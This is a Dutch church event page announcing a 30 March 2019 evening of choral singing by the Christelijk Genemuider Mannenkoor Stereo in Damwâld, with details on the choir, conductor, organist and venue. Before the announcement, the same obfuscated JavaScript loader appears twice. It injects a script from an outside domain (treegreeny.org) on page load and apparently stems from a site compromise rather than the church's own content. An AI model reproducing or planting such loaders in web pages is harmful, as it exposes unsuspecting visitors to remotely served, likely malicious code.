;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zingend naar de zondag ... Christelijk Genemuider Mannenkoor Stereo - PKN Damwâld
30 maart 2019
19:30 t/m 21:00
de Ontmoeting
Zingend naar de zondag … Christelijk Genemuider Mannenkoor Stereo

Na het succes van de Verenigde Veluwse Koren in oktober 2018, komt het Christelijk Genemuider Mannenkoor Stereo uit Genemuiden en omgeving naar Damwâld voor de 4e editie van Zingend naar de Zondag. Naast de zang van het mannenkoor staan er wederom prachtige samenzang liederen op het programma.

Het Christelijk Genemuider Mannenkoor Stereo groeide in vijftig jaar tijd uit tot een begrip in Genemuiden en verre omstreken. Het koor, met meer dan 140 enthousiaste zangers, vertolkt geestelijke liederen, klassieke werken, vaderlandse liederen en natuurlijk Psalmen. Zowel vierstemmig als met de unieke Genemuider bovenstem.
Dit alles onder leiding van Harm Hoeve uit Rouveen. Deze dirigent, met conservatorium achtergrond, en de professionele musici, dragen bij aan de kwaliteit. Stereo investeert voortdurend in zang en presentatie. Dat resulteert in meer regionale en nationale aandacht.

Stereo draagt Gods Evangelie uit door middel van zang via concerten en muziekdragers zoals CD’s. Onderlinge binding, bevorderen van de zangkunst en samenwerking met gelijkgestemden zijn belangrijke uitgangspunten. Stereo behoort tot de grotere regionale mannenkoren. De koorleden komen voornamelijk uit Zwartewaterland en directe omgeving. Opvallend voor een christelijk mannenkoor is, dat relatief veel jongeren koorlid zijn. Het Mannenkoor heeft onlangs een jubileum CD uitgebracht onder de titel “Breek uit in jubel” en een Kerst CD onder de titel “Wij loven u Immanuël”.
De organist voor deze avond is Jorrit Woudt uit Enschede. Hij begeleidt de samenzang en het mannenkoor. Hij is ook pianist, docent en dirigent. Dat laatste van 3 gemengde koren en een mannenkoor.
Wij informeren u nu al, zodat u o.a. de datum in uw agenda kunt noteren!!

Zeg het voort aan vrienden, buren en familie, want wij hopen dat opnieuw heel veel mensen zullen genieten van Gods Evangelie via (samen) zang. Tot ziens op 30 maart!!
De voorbereidingscommissie van Zingend naar de Zondag.

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld